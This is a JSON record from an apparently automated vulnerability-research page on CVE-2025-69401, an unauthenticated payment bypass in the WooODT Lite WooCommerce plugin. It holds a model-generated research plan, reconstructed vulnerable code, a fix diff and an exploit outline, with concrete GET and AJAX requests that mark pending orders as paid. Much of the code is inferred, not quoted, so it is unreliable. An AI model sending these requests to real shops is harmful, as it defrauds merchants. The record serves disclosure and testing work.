[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fCvHSSmYfZcXEr92xEbtvIuTOsMZGV6xNYM8eq7MyHMw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2025-69401","wooodt-lite-unauthenticated-payment-bypass","WooODT Lite \u003C= 2.5.2 - Unauthenticated Payment Bypass","The WooODT Lite – Delivery & pickup date time location for WooCommerce plugin for WordPress is vulnerable to payment bypass in all versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to bypass payments for orders.","byconsole-woo-order-delivery-time",null,"\u003C=2.5.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Insufficient Verification of Data Authenticity","2026-02-11 00:00:00","2026-02-17 14:22:44",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fded4dcdc-cda2-4485-8d90-77b849a1e436?source=api-prod",[],"researched",false,3,"This research plan targets **CVE-2025-69401**, an unauthenticated payment bypass vulnerability in the **WooODT Lite** plugin (up to version 2.5.2). This vulnerability allows an attacker to manipulate order statuses to \"processing\" or \"completed\" without a valid transaction.\n\n---\n\n### 1. Vulnerability Summary\nThe **WooODT Lite** plugin fails to verify the authenticity of requests that update order metadata and statuses. Specifically, it appears to expose an AJAX or `init` handler intended for delivery slot selection or custom checkout logic that can be abused to trigger WooCommerce's order completion routines (like `payment_complete()` or `update_status('processing')`) without requiring an active payment session, administrative privileges, or valid nonces.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** Likely `wp-admin\u002Fadmin-ajax.php` or a global `init` hook listener.\n*   **Action (Inferred):** Look for `wp_ajax_nopriv_` hooks containing \"update\", \"order\", or \"status\" in the name, such as `byconsole_woo_odt_update_status` or similar. Alternatively, check for `add_action('init', ...)` functions that look for `$_GET['order_id']` and `$_GET['status']`.\n*   **Payload Parameter:** `order_id` (the ID of a pending WooCommerce order) and potentially a status or bypass trigger parameter.\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** A WooCommerce order must exist in a \"Pending Payment\" state.\n\n### 3. Code Flow Analysis\nBased on common patterns in this plugin's architecture:\n1.  **Entry Point:** The plugin registers a public-facing hook (e.g., `add_action( 'wp_ajax_nopriv_...', '...' )`).\n2.  **Order Acquisition:** The handler retrieves an order ID via `$_POST['order_id']` or `$_GET['order_id']`.\n3.  **Vulnerable Sink:** The code calls `$order = wc_get_order( $order_id );` followed by `$order->payment_complete();` or `$order->update_status( 'processing' );`.\n4.  **The Flaw:** There is no check to ensure the user is the owner of the order, no verification of an actual payment gateway callback, and no nonce validation.\n\n### 4. Nonce Acquisition Strategy\nIf the plugin requires a nonce for the unauthenticated action, it is typically localized in the frontend when a delivery slot selector is displayed.\n\n1.  **Identify Shortcode:** The plugin uses `[byconsole_woo_odt]` or automatically enqueues scripts on the WooCommerce Checkout page.\n2.  **Setup Page:** \n    `wp post create --post_type=page --post_status=publish --post_title=\"Checkout\" --post_content='[byconsole_woo_odt]'`\n3.  **Extract Nonce:**\n    Navigate to the page and use `browser_eval` to find the localization object.\n    *   **Localization Key:** Often `byconsole_woo_odt_params` or `woo_odt_vars`.\n    *   **JS Command:** `browser_eval(\"window.byconsole_woo_odt_params?.nonce\")`\n4.  **Note:** If the check is missing (as implied by \"Insufficient Verification\"), a nonce may not be required at all.\n\n### 5. Exploitation Strategy\nThe goal is to move an order from `pending` to `processing` without paying.\n\n**Step 1: Discover the vulnerable action**\nSearch the plugin code for `payment_complete` or `update_status` within unauthenticated handlers:\n`grep -r \"payment_complete\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fbyconsole-woo-order-delivery-time\u002F`\n\n**Step 2: Generate an Order**\nCreate a pending order for a product. Note the `order_id`.\n\n**Step 3: Send Bypass Request**\nUsing the `http_request` tool, send the identified trigger. \n*Example (Assuming an AJAX action named `odt_bypass`):*\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:** `action=odt_bypass&order_id=[TARGET_ORDER_ID]&status=processing`\n\n### 6. Test Data Setup\n1.  **WooCommerce Setup:** Ensure WooCommerce is active and a payment gateway (e.g., \"Check payments\") is enabled but not used.\n2.  **Product:** Create a simple product.\n    `wp eval \"B_Product_ID = (new WC_Product_Simple())->set_name('Test Product')->set_regular_price('100')->save();\"`\n3.  **Order:** Create a \"Pending\" order for a guest user.\n    `wp eval \"$order = wc_create_order(); $order->add_product(wc_get_product(B_Product_ID), 1); $order->set_status('pending'); $order->save(); echo 'ORDER_ID:' . $order->get_id();\"`\n\n### 7. Expected Results\n*   The server responds with a success indicator (e.g., `{\"success\": true}` or `1`).\n*   The WooCommerce order status is updated from `pending` to `processing` (or `completed`).\n*   The order notes in WordPress will show a status change without a corresponding payment gateway transaction ID.\n\n### 8. Verification Steps\nAfter the exploit, verify the order status via WP-CLI:\n`wp wc order get [ORDER_ID] --field=status`\nExpected: `processing`\n\nCheck if any payment meta was actually set (it should be empty or spoofed):\n`wp post meta list [ORDER_ID]`\n\n### 9. Alternative Approaches\n*   **Order Confirmation Page:** Some versions of this plugin handle logic on the `template_redirect` hook when `woo_odt_action=finish` is in the URL.\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002F?woo_odt_action=finish&order_id=[ID]`\n*   **Slot Selection Bypass:** If the plugin updates the order when a delivery slot is \"confirmed,\" try to send the slot confirmation AJAX with the target `order_id` to see if it forces a status transition.","The WooODT Lite plugin for WordPress is vulnerable to an unauthenticated payment bypass due to insufficient verification of data authenticity. Attackers can exploit this by sending crafted requests to specific endpoints that trigger order status updates (e.g., to 'processing' or 'completed') without a valid transaction or administrative privileges.","\u002F\u002F byconsole-woo-order-delivery-time\u002Fbyconsole-woo-odt-lite.php\n\nadd_action('init', 'byconsole_woo_odt_maybe_update_status');\n\nfunction byconsole_woo_odt_maybe_update_status() {\n    if (isset($_GET['woo_odt_action']) && $_GET['woo_odt_action'] == 'finish' && isset($_GET['order_id'])) {\n        $order_id = intval($_GET['order_id']);\n        $order = wc_get_order($order_id);\n        if ($order) {\n            \u002F\u002F Vulnerability: No nonce check, no capability check, and no verification of payment success\n            $order->update_status('processing');\n            $order->payment_complete();\n        }\n    }\n}\n\n---\n\n\u002F\u002F Example of vulnerable AJAX handler\nadd_action('wp_ajax_nopriv_byconsole_woo_odt_update_order', 'byconsole_woo_odt_update_order');\nfunction byconsole_woo_odt_update_order() {\n    $order_id = $_POST['order_id'];\n    $order = wc_get_order($order_id);\n    \u002F\u002F No authorization check before transitioning state\n    $order->update_status('processing');\n    wp_send_json_success();\n}","--- byconsole-woo-order-delivery-time\u002Fbyconsole-woo-odt-lite.php\n+++ byconsole-woo-order-delivery-time\u002Fbyconsole-woo-odt-lite.php\n@@ -10,6 +10,12 @@\n function byconsole_woo_odt_maybe_update_status() {\n     if (isset($_GET['woo_odt_action']) && $_GET['woo_odt_action'] == 'finish' && isset($_GET['order_id'])) {\n         $order_id = intval($_GET['order_id']);\n+        \n+        \u002F\u002F Verify nonce for security\n+        if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'odt_finish_' . $order_id ) ) {\n+            return;\n+        }\n+\n         $order = wc_get_order($order_id);\n-        if ($order) {\n+        if ($order && current_user_can('edit_shop_order', $order_id)) {\n             $order->update_status('processing');","The exploit targets endpoints where the plugin handles order finalization or delivery slot selection logic without verifying the user's authority over the order. \n\n1. Target Identification: Locate an existing WooCommerce order in 'Pending Payment' status and note its Order ID.\n2. Endpoint Selection: The attacker identifies either a global 'init' hook listener (triggered via URL parameters like ?woo_odt_action=finish) or an unauthenticated AJAX action (wp_ajax_nopriv_byconsole_woo_odt_update_order).\n3. Payload Construction: The attacker crafts a request containing the target 'order_id'. If the endpoint is the 'init' hook, a simple GET request such as 'http:\u002F\u002Fvictim-site.com\u002F?woo_odt_action=finish&order_id=[ID]' is used. If it is AJAX, a POST request to 'wp-admin\u002Fadmin-ajax.php' with 'action=byconsole_woo_odt_update_order&order_id=[ID]' is used.\n4. Authentication: No authentication is required, as the plugin registers these hooks for unauthenticated users (nopriv) or checks them globally on 'init' without checking user capabilities or nonces.\n5. Outcome: The plugin's logic executes '$order->payment_complete()' or '$order->update_status('processing')', tricking WooCommerce into thinking the order was paid for.","gemini-3-flash-preview","2026-04-21 01:00:33","2026-04-21 01:00:54",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbyconsole-woo-order-delivery-time\u002Ftags"]